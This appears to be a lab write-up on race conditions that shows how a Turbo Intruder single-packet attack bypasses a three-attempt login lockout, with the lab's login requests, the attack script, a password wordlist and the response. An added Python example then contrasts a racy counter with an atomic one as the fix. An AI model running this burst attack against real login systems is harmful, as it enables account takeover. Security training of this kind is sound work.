Race conditions are a common class of vulnerability and are closely related to business logic flaws. They occur when a website processes requests concurrently without adequate safeguards, so that several distinct threads interact with the same data at the same time and conflict, producing unintended behaviour in the application.
The common attack methods are:
- Bypassing actions that should only be possible once
- Bypassing brute-force password limits
- Bypassing multi-step flows
- Single-packet attacks
- Bypassing time-based mechanisms
2. Bypassing brute-force password limits
The target site locks the account for 10 seconds after three wrong passwords, but if a large number of login requests with different passwords are sent at the same instant, this limit can be bypassed.
First send the following login request to Turbo Intruder via Extensions / Turbo Intruder / Send to turbo intruder:
########### request ###########
POST /login HTTP/2
Host: 0afb00fd046f7a6d82e620da00cf000b.web-security-academy.net
Cookie: session=51MNANP3VemzBiCc7NVsaQgR1IdDuq1J
...omit...
csrf=RQrrsXrTYltTnCOmRgRUW06cZp6kAXEE&username=carlos&password=superman
In Turbo Intruder, replace the password value with %s, as below:
########### request ###########
POST /login HTTP/2
Host: 0afb00fd046f7a6d82e620da00cf000b.web-security-academy.net
Cookie: session=51MNANP3VemzBiCc7NVsaQgR1IdDuq1J
...omit...
csrf=RQrrsXrTYltTnCOmRgRUW06cZp6kAXEE&username=carlos&password=%s
Then choose examples/race-single-packet-attack.py from the templates and modify it as follows:
def queueRequests(target, wordlists):
    # if the target supports HTTP/2, use engine=Engine.BURP2 to trigger the single-packet attack
    # if they only support HTTP/1, use Engine.THREADED or Engine.BURP instead
    # for more information, check out https://portswigger.net/research/smashing-the-state-machine
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2
                           )

    # assign the list of candidate passwords from your clipboard
    passwords = wordlists.clipboard

    # queue a login request using each password from the wordlist
    # the 'gate' argument withholds the final part of each request until engine.openGate() is invoked
    for password in passwords:
        engine.queue(target.req, password, gate='1')

    # once every request tagged with gate '1' has been queued,
    # invoke engine.openGate() to send them in sync
    engine.openGate('1')


def handleResponse(req, interesting):
    table.add(req)
Because this script reads its candidates with passwords = wordlists.clipboard, the passwords must first be copied from the wordlist to the clipboard; the wordlist must contain one password per line, like this:
123123
abc123
football
monkey
...omit...
After copying, click Attack in Turbo Intruder. All the login requests with different passwords are sent at once, and even with the three-attempt limit the server cannot process such a sudden burst of simultaneous requests in time. Once the correct password is hit, the following response is returned:
HTTP/2 302 Found
Location: /my-account?id=carlos
Set-Cookie: session=ipaou37SDt58D1igheOIc0dZhIKbj09T; Secure; HttpOnly; SameSite=None
X-Frame-Options: SAMEORIGIN
Content-Length: 0
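Why a synchronized burst defeats a counter-based lock-out, as an added Python illustration that is not part of this write-up or of the lab: a toy limiter whose check and increment are separated by a simulated database round trip is compared with one that reserves a failure slot atomically before the password is verified. The correct password, the guess list and the RACE_WINDOW delay are constructed values.

```python
import threading
import time

MAX_FAILURES = 3      # the lab's three-strikes rule (lockout timer omitted)
RACE_WINDOW = 0.2     # seconds; stands in for the server's DB round trip

class RacyLimiter:
    """Check-then-act with no lock: every request arriving inside the
    window reads failures == 0, so none of them is turned away."""
    def __init__(self):
        self.failures = 0

    def attempt(self, password, correct="s3cret"):
        if self.failures >= MAX_FAILURES:
            return "locked"
        time.sleep(RACE_WINDOW)           # counter is still stale here
        if password == correct:
            return "ok"
        self.failures += 1                # too late to stop the others
        return "wrong"

class AtomicLimiter:
    """Reserve a slot under the lock before verifying the password, so a
    burst of N requests consumes at most MAX_FAILURES slots. In production
    the lock is an atomic datastore increment (Redis INCR, SQL UPDATE)."""
    def __init__(self):
        self.failures = 0
        self.lock = threading.Lock()

    def attempt(self, password, correct="s3cret"):
        with self.lock:
            if self.failures >= MAX_FAILURES:
                return "locked"
            self.failures += 1
        time.sleep(RACE_WINDOW)
        return "ok" if password == correct else "wrong"

def burst(limiter, passwords):
    """Release every guess at the same instant (the single-packet effect)
    and return how many were evaluated rather than rejected as locked."""
    gate = threading.Barrier(len(passwords))
    results = [None] * len(passwords)
    def worker(i, pw):
        gate.wait()                       # all threads start together
        results[i] = limiter.attempt(pw)
    threads = [threading.Thread(target=worker, args=(i, p))
               for i, p in enumerate(passwords)]
    for t in threads: t.start()
    for t in threads: t.join()
    return sum(r != "locked" for r in results)
```

Running burst() over a dozen constructed guesses lets every guess through on RacyLimiter but only three on AtomicLimiter; the fix is to count the attempt atomically before doing the expensive check, not after it.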
For other methods, see Race conditions | 牛的大腦